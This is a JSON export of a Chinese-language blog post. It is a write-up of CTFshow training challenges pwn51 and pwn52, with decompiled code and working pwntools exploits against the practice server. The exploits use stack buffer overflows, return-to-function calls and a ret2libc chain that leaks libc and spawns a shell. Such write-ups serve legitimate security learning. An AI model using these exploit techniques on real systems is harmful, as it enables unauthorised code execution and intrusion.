{"id":281,"date":"2025-02-21T15:41:52","date_gmt":"2025-02-21T07:41:52","guid":{"rendered":"https:\/\/www.okabe.xin\/?p=281"},"modified":"2025-02-21T15:41:52","modified_gmt":"2025-02-21T07:41:52","slug":"281","status":"publish","type":"post","link":"https:\/\/www.okabe.xin\/wordpress\/?p=281","title":{"rendered":"\u9752\u6625\u732a\u5934\u5c11\u5e74\u4e0d\u4f1apwn\u6389\u5154\u5973\u90ce"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">pwn51<\/h2>\n\n\n\n<p>32\u4f4d<\/p>\n\n\n\n<p>\u53cd\u7f16\u8bd1\u540e\u50bb\u773c\u4e86<\/p>\n\n\n\n<p>\u662fC++<\/p>\n\n\n\n<p>\u770b\u4e0d\u592a\u61c2\uff0c\u9760\u7740string\u754c\u9762\u627e\u5230\u4e86\u4e3b\u8981\u51fd\u6570sub_8049059<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>int sub_8049059()<br>{<br> &nbsp;int v0; \/\/ eax<br> &nbsp;int v1; \/\/ eax<br> &nbsp;unsigned int v2; \/\/ eax<br> &nbsp;int v3; \/\/ eax<br> &nbsp;const char *v4; \/\/ eax<br> &nbsp;int v6; \/\/ &#91;esp-Ch] &#91;ebp-84h]<br> &nbsp;int v7; \/\/ &#91;esp-8h] &#91;ebp-80h]<br> &nbsp;_BYTE v8&#91;12]; \/\/ &#91;esp+0h] &#91;ebp-78h] BYREF<br> &nbsp;char s&#91;32]; \/\/ &#91;esp+Ch] &#91;ebp-6Ch] BYREF<br> &nbsp;_BYTE v10&#91;24]; \/\/ &#91;esp+2Ch] &#91;ebp-4Ch] BYREF<br> &nbsp;_BYTE v11&#91;24]; \/\/ &#91;esp+44h] &#91;ebp-34h] BYREF<br> &nbsp;unsigned int i; \/\/ &#91;esp+5Ch] &#91;ebp-1Ch]<br>\u200b<br> &nbsp;memset(s, 0, sizeof(s));<br> &nbsp;puts(\"Who are you?\");<br> &nbsp;read(0, s, 0x20u);<br> &nbsp;std::string::operator=(&amp;unk_804D0A0, &amp;unk_804A350);<br> &nbsp;std::string::operator+=(&amp;unk_804D0A0, s);<br> &nbsp;std::string::basic_string(v10, &amp;unk_804D0B8);<br> &nbsp;std::string::basic_string(v11, &amp;unk_804D0A0);<br> &nbsp;sub_8048F06(v8);<br> &nbsp;std::string::~string(v11, v11, v10);<br> &nbsp;std::string::~string(v10, v6, v7);<br> &nbsp;if ( sub_80496D6(v8) &gt; 1u )<br>  {<br> &nbsp; &nbsp;std::string::operator=(&amp;unk_804D0A0, &amp;unk_804A350);<br> &nbsp; &nbsp;v0 = sub_8049700(v8, 0);<br> &nbsp; &nbsp;if 
( (unsigned __int8)sub_8049722(v0, &amp;unk_804A350) )<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;v1 = sub_8049700(v8, 0);<br> &nbsp; &nbsp; &nbsp;std::string::operator+=(&amp;unk_804D0A0, v1);<br> &nbsp;  }<br> &nbsp; &nbsp;for ( i = 1; ; ++i )<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;v2 = sub_80496D6(v8);<br> &nbsp; &nbsp; &nbsp;if ( v2 &lt;= i )<br> &nbsp; &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp; &nbsp;std::string::operator+=(&amp;unk_804D0A0, \"IronMan\");<br> &nbsp; &nbsp; &nbsp;v3 = sub_8049700(v8, i);<br> &nbsp; &nbsp; &nbsp;std::string::operator+=(&amp;unk_804D0A0, v3);<br> &nbsp;  }<br>  }<br> &nbsp;v4 = (const char *)std::string::c_str(&amp;unk_804D0A0);<br> &nbsp;strcpy(s, v4);<br> &nbsp;printf(\"Wow!you are:%s\", s);<br> &nbsp;return sub_8049616(v8);<br>}<\/code><\/pre>\n\n\n\n<p>\u7c97\u7565\u7406\u89e3\u4e4b\u4e0b\uff0c\u77e5\u9053s\u5c31\u662f\u8981\u6ea2\u51fa\u7684\u5bf9\u8c61\uff0c\u8ba4\u4e3a\u504f\u79fb\u503c\u5c31\u662fchar s[32]; \/\/ [esp+Ch] [ebp-6Ch] BYREF\uff0c\u4e5f\u5c31\u662f0x6C+4<\/p>\n\n\n\n<p>string\u754c\u9762\u8fd8\u80fd\u627e\u5230\u4e00\u6761system\u6307\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>int sub_804902E()<br>{<br> &nbsp;return system(\"cat \/ctfshow_flag\");<br>}<\/code><\/pre>\n\n\n\n<p>\u521d\u6b65\u5c1d\u8bd5\u5931\u8d25\uff0c\u867d\u7136\u770b\u7740\u5e94\u8be5\u6ca1\u4ec0\u4e48\u95ee\u9898<\/p>\n\n\n\n<p>\u4f46\u662fread(0, s, 0x20u)\u9650\u5236\u8f93\u5165\u53ea\u67090x20\u5b57\u8282<\/p>\n\n\n\n<p>\u6240\u4ee5\u5c1d\u8bd5\u8f93\u51650x6C+4\u4e2a\u2018a\u2019\u5c31\u6ca1\u529e\u6cd5\u8f93\u5165\u591f<\/p>\n\n\n\n<p>\u770bWP\u624d\u77e5\u9053\u4e3b\u51fd\u6570\u91cc\u9762\u4f1a\u628aI\u6362\u6210IronMan<\/p>\n\n\n\n<p>16\u4e2aI\u7684\u8f93\u5165\u5c31\u80fd\u521a\u521a\u597d\u53d8\u6210112\u5b57\u8282\uff0816*7=0x6C+4\uff09IronMan\uff0c\u800cstrcpy(s, v4)\u6ca1\u6709\u9650\u5236\u5b57\u8282\u6570\uff0c\u5b8c\u6210\u6ea2\u51fa\u6548\u679c<\/p>\n\n\n\n<p>\u7136\u540e\u540e\u7eed\u8ddf\u4e00\u4e2asystem\u51fd\u6570sub_804902E\u7684\u5730\u5740\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn 
import *<br>u=remote(\"pwn.challenge.ctf.show\",28223)<br>payload=b'I'*16+p32(0x0804902E)<br>#payload=b'I'*16+p32(0x08049042)<br>u.sendline(payload)<br>u.interactive()<\/code><\/pre>\n\n\n\n<p>\u6b64\u4e8b\u5728\u76f4\u63a5\u672c\u5730\u8fd0\u884c\u4ea6\u6709\u8bb0\u8f7d\uff08<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ctfshow@ubuntu:~\/Desktop\/xd\/LibcSearcher$ .\/pwn51<br> &nbsp; &nbsp;\u2584\u2584\u2584\u2584 &nbsp; \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 &nbsp;\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\u2584\u2584 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp;\u2588\u2588\u2580\u2580\u2580\u2580\u2588 &nbsp;\u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580 &nbsp;\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> \u2588\u2588\u2580 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\u2588\u2588 &nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp;\u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584 &nbsp;\u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584 &nbsp; \u2584\u2588\u2588\u2588\u2588\u2584 &nbsp;\u2588\u2588 &nbsp; &nbsp; &nbsp;\u2588\u2588<br> \u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; \u2588\u2588\u2588\u2588\u2588\u2588\u2588 &nbsp; \u2588\u2588\u2584\u2584\u2584\u2584 \u2580 &nbsp;\u2588\u2588\u2580 &nbsp; \u2588\u2588 &nbsp;\u2588\u2588\u2580 &nbsp;\u2580\u2588\u2588 \u2580\u2588 &nbsp;\u2588\u2588 &nbsp;\u2588\u2580<br> \u2588\u2588\u2584 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\u2588\u2588 &nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp; \u2580\u2580\u2580\u2580\u2588\u2588\u2584 &nbsp;\u2588\u2588 &nbsp; &nbsp;\u2588\u2588 &nbsp;\u2588\u2588 &nbsp; &nbsp;\u2588\u2588 &nbsp;\u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 <br> &nbsp;\u2588\u2588\u2584\u2584\u2584\u2584\u2588 
&nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp;\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 &nbsp;\u2588\u2588 &nbsp; &nbsp;\u2588\u2588 &nbsp;\u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580 &nbsp;\u2580\u2588\u2588 &nbsp;\u2588\u2588\u2580 <br> &nbsp; &nbsp;\u2580\u2580\u2580\u2580 &nbsp; &nbsp; &nbsp;\u2580\u2580 &nbsp; &nbsp; \u2580\u2580 &nbsp; &nbsp; &nbsp; &nbsp; \u2580\u2580\u2580\u2580\u2580\u2580 &nbsp; \u2580\u2580 &nbsp; &nbsp;\u2580\u2580 &nbsp; &nbsp;\u2580\u2580\u2580\u2580 &nbsp; &nbsp; \u2580\u2580 &nbsp;\u2580\u2580 &nbsp;<br> &nbsp; &nbsp;* ************************************* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp;* Classify: CTFshow --- PWN --- \u5165\u95e8 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;* Type  : Stack_Overflow &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;* Site  : https:\/\/ctf.show\/ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp;* Hint  : Who are you? 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;* ************************************* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br>Who are you?<br>I<br>Wow!you are:IronMan<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn52<\/h2>\n\n\n\n<p>flag\u51fd\u6570<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>char *__cdecl flag(int a1, int a2)<br>{<br> &nbsp;char *result; \/\/ eax<br> &nbsp;char s&#91;64]; \/\/ &#91;esp+Ch] &#91;ebp-4Ch] BYREF<br> &nbsp;FILE *stream; \/\/ &#91;esp+4Ch] &#91;ebp-Ch]<br>\u200b<br> &nbsp;stream = fopen(\"\/ctfshow_flag\", \"r\");<br> &nbsp;if ( !stream )<br>  {<br> &nbsp; &nbsp;puts(\"\/ctfshow_flag: No such file or directory.\");<br> &nbsp; &nbsp;exit(0);<br>  }<br> &nbsp;result = fgets(s, 64, stream);<br> &nbsp;if ( a1 == 876 &amp;&amp; a2 == 877 )<br> &nbsp; &nbsp;return (char *)printf(s);<br> &nbsp;return result;<br>}<\/code><\/pre>\n\n\n\n<p>\u521d\u7565\u7406\u89e3\u540e\uff0c\u5927\u610f\u4e3a\u4f20\u5165\u53c2\u6570a1,a2\u4e3a\u5bf9\u5e94\u503c<\/p>\n\n\n\n<p>\u5c31\u53ef\u4ee5\u8f93\u51fa\u6570\u7ec4s\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>\u800c\u6570\u7ec4s\u8bfb\u53d6\u4e86stream\u7684\u524d64\u5b57\u8282\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>stream\u53c8\u662f\u4f9d\u9760\u53ea\u8bfb\u6253\u5f00\u7684ctfshow_flag\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>\u6240\u4ee5\u62ff\u5230\u6570\u7ec4S\u5c31\u662f\u62ff\u5230\u76ee\u6807flag<\/p>\n\n\n\n<p>\u627eflag\u51fd\u6570\u5730\u5740<\/p>\n\n\n\n<p>\u518d\u627e\u5230\u504f\u79fb\u91cf<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>u=remote(\"pwn.challenge.ctf.show\",28231)<br>offset = 0x6C<br>flag = 
0x08048586<br>payload=b'a'*(offset+4)+p32(flag)+p32(0)+p32(876)+p32(877)<br>u.sendline(payload)<br>u.interactive()<\/code><\/pre>\n\n\n\n<p>\u8fd8\u53ef\u4ee5\u7528ret2libc\u505a\uff0c\u5b58\u5728puts\u51fd\u6570\uff0c\u5957\u677f\u5b50\u5c31\u80fd\u51fa<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>from LibcSearcher import *<br>\u200b<br>io = remote('pwn.challenge.ctf.show', 28188)<br># io = process(\"\")<br>elf = ELF('.\/pwn52')<br># libc= ELF('libc.so.6')<br>\u200b<br>main_add =0x0804874E<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>print(\"Puts_got: \", hex(puts_got))<br>print(\"Puts_plt: \", hex(puts_plt))<br>\u200b<br>offset =0x6C<br>\u200b<br>payload1 = b'a' * (offset + 4) + p32(puts_plt) + p32(main_add) + p32(puts_got)<br>io.sendlineafter(b'What do you want?', payload1)<br>puts_addr = u32(io.recvuntil(b'\\xf7')&#91;-4:])<br>print(\"Puts_addr: \", hex(puts_addr))<br>\u200b<br>libc = LibcSearcher('puts', puts_addr)<br>\u200b<br>libc_base = puts_addr - libc.dump('puts')<br>system_add = libc_base + libc.dump('system')<br>bin_sh_add = libc_base + libc.dump('str_bin_sh')<br>\u200b<br># libc_base = puts_addr - libc.symbols&#91;'puts']<br># system_add = libc_base + libc.symbols&#91;'system']<br># bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>\u200b<br>payload2 = b'a' * (offset + 4) + p32(system_add) + p32(0) + p32(bin_sh_add)<br>io.sendlineafter(b'What do you want?', payload2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>pwn51 32\u4f4d \u53cd\u7f16\u8bd1\u540e\u50bb\u773c\u4e86 \u662fC++ \u770b\u4e0d\u592a\u61c2\uff0c\u9760\u7740string\u754c\u9762\u627e\u5230\u4e86\u4e3b\u8981\u51fd\u6570sub_804905 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-281","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/281","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=281"}],"version-history":[{"count":0,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/281\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=281"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}